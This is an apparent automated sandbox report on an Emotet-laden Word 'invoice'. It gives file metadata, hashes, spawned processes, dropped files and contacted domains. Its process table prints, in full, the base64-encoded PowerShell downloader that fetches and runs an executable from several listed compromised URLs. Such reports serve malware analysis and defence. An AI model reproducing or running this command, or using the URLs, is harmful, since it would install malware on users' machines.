File name: | DOC_61331281576293_KQQ_10092019.doc |
Full analysis: | https://app.any.run/tasks/a52252a1-aa03-4fee-91d0-99171c7ee784 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 16:04:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: invoice, Subject: Handmade Wooden Ball, Author: Francisco Moore, Keywords: Handmade Steel Gloves, Comments: Health, Grocery & Sports, Template: Normal.dotm, Last Saved By: Brandt Schmeler, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0 |
MD5: | CFB022A24FF5F5E53B3CA65AF95CB955 |
SHA1: | 6F54934A6FD7B531DCFE11A9F53A187E1C25E5B0 |
SHA256: | 843FAD6602A50A9CF09F0D44AD8CF1BE1A102EC005D87C9D194B3D166555CF5D |
SSDEEP: | 3072:xeGRyYpKgdzSrGtKyIwLx3Z7JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:xeGRyYpKUzSSnLx3vzOYVHs2f |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Abernathy |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 196 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Donnelly - Legros |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 168 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:10:09 12:18:00 |
CreateDate: | 2019:10:09 12:18:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Brandt Schmeler |
Template: | Normal.dotm |
Comments: | Health, Grocery & Sports |
Keywords: | Handmade Steel Gloves |
Author: | Francisco Moore |
Subject: | Handmade Wooden Ball |
Title: | invoice |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2920 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC_61331281576293_KQQ_10092019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3048 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4D61.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3048 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HQHGTVCMWM4OWIDH92YO.temp | — | |
MD5:— | SHA256:— | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C71829A.wmf | wmf | |
MD5:39B226DCDE960ED7A1EBD1C4550E76CB | SHA256:3F5567A80C18610D3BE48C9B6847AD238E388ABB51F5C2BFE8C57E07D0A8FBE6 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:CB0890A34CBD6E1BE368D4CBC9212F34 | SHA256:2913ED40B1A05DF7601B950AD1775A6BF15ABDA50CC4217E265085D78674A255 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77D0E3AC.wmf | wmf | |
MD5:8CAF4B8DDF62F9419E9412331F2A0613 | SHA256:7794580CD83C1B5E638641C943C437E0C71391FF4FD54B1DB0D560CF8C642149 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9A7F5B8.wmf | wmf | |
MD5:18D4FE9816516121A947F38F3B264E2F | SHA256:915A47CB381E56E5B5DD7778155DF51A0661D230CC14AC4AD6614E11A750066B | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:2DA58DFA0A746AE4C0816EC01627AE58 | SHA256:2D77767D3BD45212922E09BC4344CE79B3D2059A832B9AF0DD77FA58FE77AC34 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CD6FDD3.wmf | wmf | |
MD5:2344F33A41453E14A0410437115F9710 | SHA256:CC735FAB5B9D09BCE7B5AF8BB2394145ED9882C2B7CE6909CB6E62D394F92549 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C1E17BD.wmf | wmf | |
MD5:9CA70E577CADBB131E20F402CF6143DA | SHA256:3A300BEAD2F06048BFB71656D68D69ACCC33496BD57EE0EC17CE81F61A3717E8 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$C_61331281576293_KQQ_10092019.doc | pgc | |
MD5:4ED0419A13D5E9B4EC3370AB2BBAC586 | SHA256:BED295D07F8C85976F855A0E5487703FBA09ACDC8552ECF6BB1E465DC5764933 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3048 | powershell.exe | GET | 403 | 146.88.234.116:80 | http://stephporn.com/cgi-bin/oSWSyiKNzf/ | FR | html | 318 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3048 | powershell.exe | 166.62.103.202:443 | newagesl.com | GoDaddy.com, LLC | US | suspicious |
3048 | powershell.exe | 43.255.154.26:443 | thehopeherbal.com | GoDaddy.com, LLC | SG | suspicious |
3048 | powershell.exe | 146.88.234.116:80 | stephporn.com | PlanetHoster | FR | suspicious |
3048 | powershell.exe | 35.238.93.185:443 | e-centricity.com | — | US | unknown |
Domain | IP | Reputation |
---|---|---|
stephporn.com |
| suspicious |
thehopeherbal.com |
| suspicious |
e-centricity.com |
| malicious |
newagesl.com |
| suspicious |